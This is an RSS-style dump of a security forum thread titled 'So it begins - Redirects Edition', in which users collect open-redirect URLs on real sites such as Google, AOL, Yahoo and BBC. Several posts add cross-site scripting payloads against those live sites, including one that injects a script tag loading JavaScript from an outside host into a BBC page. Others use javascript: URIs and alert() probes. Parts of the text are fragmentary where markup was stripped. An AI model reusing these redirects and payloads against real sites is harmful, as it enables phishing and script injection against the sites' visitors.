So it begins - Redirects Edition Post your redirects here.. i'll start it off just keeping your eye open for an http:// link as a parameter for a page (i.e. http:/example.com/content.php?blah=50&url=http:/www.imaredirectlink.com&p=6) is the easiest way to come across them.. that being said, i've never been to this site before, nor since >.> http://www.sexocean.com/cgi-bin/tt.cgi?cmd=out&url=http://sla.ckers.org/forum/profile.php?1,50 lol.. -maluc http://sla.ckers.org/forum/read.php?3,505,505#msg-505 Mon, 20 May 2013 11:32:55 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?3,505,29614#msg-29614 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,29614#msg-29614
Try a Google search - allinurl:/nethelp/default.htm

For example:
http://www.softpro.hr/NetHelp/NetHelp/default.htm?turl=http://sla.ckers.org

javascript and data work too.

-Mazlo]]> Mazlo Full Disclosure Fri, 31 Jul 2009 13:08:59 -0500 http://sla.ckers.org/forum/read.php?3,505,28969#msg-28969 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,28969#msg-28969
http://www.google.com/tbproxy/redir?hl=en&lt=isbn&q=../../../open-redirect

Greetz!!]]> sirdarckcat Full Disclosure Sun, 21 Jun 2009 23:34:12 -0500 http://sla.ckers.org/forum/read.php?3,505,28216#msg-28216 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,28216#msg-28216 -------------------------------------------------------
> Anyone want to make their own articles?
> http://www.bbc.co.uk/cgi-bin/navigation/mailto.pl?
> from=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%
> 3E&subject=&body=&x=66&y=15&REFERER=http%3A%2F%2Fw
> ww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

Page still not fixed, you can still make your own articles:

http://www.bbc.co.uk/cgi-perl/navigation/mailto.pl?from=&subject=&body=%3C/textarea%3E%3Cscript%20src=%22http://jurriaanpruis.nl/bbc_js.js%22%3E%3C/script%3E&x=66&y=15&REFERER=http%3A%2F%2Fwww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml]]> Jurpie Full Disclosure Sun, 17 May 2009 04:16:43 -0500 http://sla.ckers.org/forum/read.php?3,505,26276#msg-26276 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,26276#msg-26276 tx Full Disclosure Mon, 26 Jan 2009 16:56:06 -0600 http://sla.ckers.org/forum/read.php?3,505,25603#msg-25603 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,25603#msg-25603
So in the meantime, enjoy this obvious link: http://anonym.to//http%3A//google.com]]> tx Full Disclosure Fri, 12 Dec 2008 22:59:32 -0600 http://sla.ckers.org/forum/read.php?3,505,25038#msg-25038 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,25038#msg-25038 C1c4Tr1Z Full Disclosure Fri, 24 Oct 2008 17:40:59 -0500 http://sla.ckers.org/forum/read.php?3,505,25030#msg-25030 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,25030#msg-25030 iNs4n3 Full Disclosure Fri, 24 Oct 2008 11:02:28 -0500 http://sla.ckers.org/forum/read.php?3,505,23870#msg-23870 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23870#msg-23870 server.iad.liveperson.net]]]> trev Full Disclosure Tue, 05 Aug 2008 18:16:50 -0500 http://sla.ckers.org/forum/read.php?3,505,23837#msg-23837 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23837#msg-23837
http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/]]> C1c4Tr1Z Full Disclosure Mon, 04 Aug 2008 21:50:15 -0500 http://sla.ckers.org/forum/read.php?3,505,23834#msg-23834 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23834#msg-23834
what's interesting about this is that aol.tw and aol.com have different security standards, because contrary to aol.tw, aol.com warns you

http://search.aol.com/aol/redir?src=PTL&clickedItemURN=http://wocares.com

what's EVEN MORE funny is that the better security of aol.com contains XSS:

hxxp://search.aol.com/aol/redirWarn?redirAuth=nauth&clickedItemURN=http://wocares.com/sieben"><script>alert('XSS')</script>]]> Kyo Full Disclosure Mon, 04 Aug 2008 20:58:16 -0500 http://sla.ckers.org/forum/read.php?3,505,23680#msg-23680 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23680#msg-23680 asilvermtzion Full Disclosure Sun, 27 Jul 2008 17:15:47 -0500 http://sla.ckers.org/forum/read.php?3,505,23118#msg-23118 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23118#msg-23118 tx Full Disclosure Sun, 22 Jun 2008 15:00:24 -0500 http://sla.ckers.org/forum/read.php?3,505,23068#msg-23068 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,23068#msg-23068
http://pierceive.com/cgi-bin/awstats/awredir.pl?url=http://google.com/

A quote from that script: 

if (! $ENV{'GATEWAY_INTERFACE'}) {      # Run from command line
        print "----- $PROG $VERSION (c) Laurent Destailleur -----\n";
        print "This script is absolutely not required to use AWStats.\n";
        print "It's a third tool that can help webmaster in their tracking tasks but is\n";
        print "not used by AWStats engine.\n";
        print "\n";
        print "This tools must be used as a CGI script. When called as a CGI, it returns to\n";
        print "browser a redirector to tell it to show the page provided in 'url' parameter.\n";
        print "So, to use this script, you must replace HTML code for external links onto your\n";
        print "HTML pages from\n";
        print "<a href=\"http://externalsite/pagelinked\">Link</a>\n";
        print "to\n";
        print "<a href=\"http://mysite/cgi-bin/awredir.pl?url=http://externalsite/pagelinked\">Link</a>\n";
        print "\n";
        print "For your web visitor, there is no difference. However this allow you to track\n";
        print "clicks done on links onto your web pages that point to external web sites,\n";
        print "because an entry will be seen in your own server log, to awredir.pl script\n";
        print "with url parameter, even if link was pointing to another external web server.\n";
        print "\n";
        sleep 2;
        exit 0;
}

But does anybody care to read this?]]> trev Full Disclosure Fri, 20 Jun 2008 04:17:37 -0500 http://sla.ckers.org/forum/read.php?3,505,22802#msg-22802 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,22802#msg-22802 CrYpTiC_MauleR Full Disclosure Fri, 06 Jun 2008 01:51:54 -0500 http://sla.ckers.org/forum/read.php?3,505,22435#msg-22435 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,22435#msg-22435

creators of dictionary.com, thesaurus.com, reference.com]]> KleverOneR Full Disclosure Thu, 22 May 2008 15:35:28 -0500 http://sla.ckers.org/forum/read.php?3,505,22168#msg-22168 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,22168#msg-22168
Newly elected Mayor of London! Lord save us!]]> cyrus Full Disclosure Sat, 03 May 2008 09:02:11 -0500 http://sla.ckers.org/forum/read.php?3,505,20790#msg-20790 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,20790#msg-20790
omg, please. no. they have *hardcoded* this fscking workaround ?

well, looks like they're ready to form MicroHoo! they already have the same bug management system...]]> Malkav Full Disclosure Thu, 21 Feb 2008 14:38:20 -0600 http://sla.ckers.org/forum/read.php?3,505,20789#msg-20789 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,20789#msg-20789
also xss, if you prefer: http://clk.about.com/?zi=1/1&zu=javascript:alert%28document.domain%29]]> tx Full Disclosure Thu, 21 Feb 2008 14:17:45 -0600 http://sla.ckers.org/forum/read.php?3,505,20555#msg-20555 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,20555#msg-20555
There was a similar one posted before, but that now gives a warning page: http://rds.yahoo.com/**http%3a//www.google.com/]]> tx Full Disclosure Wed, 13 Feb 2008 15:28:13 -0600 http://sla.ckers.org/forum/read.php?3,505,20484#msg-20484 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,20484#msg-20484
EDIT: This appears to affect all versions of Thunderstone's Webinator software: http://search.thunderstone.com/texis/redir/main.bin?q=&u=http://www.google.com]]> tx Full Disclosure Mon, 11 Feb 2008 16:08:13 -0600 http://sla.ckers.org/forum/read.php?3,505,18684#msg-18684 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,18684#msg-18684
anyQueryString is modifiable, as is asdf.com/

-maluc]]> maluc Full Disclosure Tue, 01 Jan 2008 11:27:57 -0600 http://sla.ckers.org/forum/read.php?3,505,18441#msg-18441 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,18441#msg-18441 http://www.becksbeer.com/lda.aspx?ReturnUrl=http://sla.ckers.org
...]]> Reiners Full Disclosure Mon, 17 Dec 2007 17:33:29 -0600 http://sla.ckers.org/forum/read.php?3,505,18435#msg-18435 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,18435#msg-18435 Better Business Bureau]]> thrill Full Disclosure Mon, 17 Dec 2007 13:40:16 -0600 http://sla.ckers.org/forum/read.php?3,505,18304#msg-18304 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,18304#msg-18304 <div id="mylousycode" expr="window.location('http://www.google.com')" style="background:url('javascript:eval(document.all.mylousycode.expr)')"></div>]]> krazl Full Disclosure Thu, 13 Dec 2007 22:06:59 -0600 http://sla.ckers.org/forum/read.php?3,505,16307#msg-16307 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16307#msg-16307 thornmaker Full Disclosure Wed, 26 Sep 2007 22:24:19 -0500 http://sla.ckers.org/forum/read.php?3,505,16296#msg-16296 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16296#msg-16296 http://maps.google.nl/local_url?q=http://sla.ckers.org

Might work on more sub-domains.]]> Spyware Full Disclosure Wed, 26 Sep 2007 15:03:50 -0500 http://sla.ckers.org/forum/read.php?3,505,16241#msg-16241 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16241#msg-16241 -------------------------------------------------------
> http://www.rpi2u.com/message.asp?message=somewhere
> Here..

That is not a redirect. It is a XSS hole http://www.rpi2u.com/message.asp?message=<script>alert(1)</script> though, which you could post in the other "So it begins..." forum.]]> Spyware Full Disclosure Tue, 25 Sep 2007 04:51:31 -0500 http://sla.ckers.org/forum/read.php?3,505,16228#msg-16228 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16228#msg-16228 Anonymous User Full Disclosure Tue, 25 Sep 2007 02:08:36 -0500 http://sla.ckers.org/forum/read.php?3,505,16215#msg-16215 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16215#msg-16215 krazl Full Disclosure Mon, 24 Sep 2007 23:38:13 -0500 http://sla.ckers.org/forum/read.php?3,505,16110#msg-16110 Re: So it begins - Redirects Edition http://sla.ckers.org/forum/read.php?3,505,16110#msg-16110

:)]]> Cynic Full Disclosure Thu, 20 Sep 2007 23:54:50 -0500